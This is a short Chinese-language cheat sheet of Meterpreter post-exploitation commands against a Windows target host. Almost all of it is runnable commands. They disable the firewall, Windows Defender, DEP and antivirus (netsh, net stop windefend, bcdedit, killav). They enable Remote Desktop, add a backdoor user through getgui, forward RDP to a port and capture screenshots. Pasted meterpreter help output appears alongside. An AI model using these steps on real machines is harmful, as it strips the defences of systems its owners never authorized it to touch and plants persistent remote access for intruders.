0x00:关闭防火墙
先进入到目标机shell
netsh advfirewall set allprofiles state off ##(管理员以及以上权限)
msf连接靶机shell出现乱码的解决办法输入: chcp 65001
0x01:关闭Denfender
关闭windows自带的防护
net stop windefend
0x02:关闭DEP
数据执行保护
bcdedit.exe /set {current} nx AlwaysOff
0x03:关闭杀毒软件
run killav
run post/windows/manage/killava
输入 run killav 提示建议使用 post/windows/manage/killav
0x04:远程桌面
开启远程桌面
run post/windows/manage/enable_rdp
会生成一个文件,该文件可用来 再关闭远程桌面
run multi_console_command -r 文件地址
或
run getgui -e ## 开启远程桌面
该模块快要不用了,以后要移除了,系统建议使用
post/windows/manage/enable_rdp 就是上面的方式
run getgui -e
meterpreter > run getgui -h [!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp. [!] Example: run post/windows/manage/enable_rdp OPTION=value [...] Windows Remote Desktop Enabler Meterpreter Script Usage: getgui -u <username> -p <password> Or: getgui -e OPTIONS: -e Enable RDP only. ##仅仅是开启远程桌面 -f <opt> Forward RDP Connection. -h Help menu. -p <opt> The Password of the user to add. ##生成用户名和密码 -u <opt> The Username of the user to add. meterpreter > meterpreter >
反弹回来的结果显示开启成果,但是打开目标主机发现并没有开启远程控制
而且此时 用 run post/windows/manage/enable_rdp 也无法开启远程桌面了
该方法也可以用
run multi_console_command -r 文件地址
关闭远程桌面
开启远程桌面并添加一个新用户bean
run getgui -u bean -p ean
开启远程桌面并绑定在8888端口
run getgui -e -f 8888
登录远程桌面
root@kali:~# rdesktop -u username -p passwd 192.168.1.1
桌面截图
>screengrab
加载这个工具
>load espia
>? #显示该工具信息
>screengrab #截图
其中提示了一个其他的工具,打开文件用的?
gio
finished!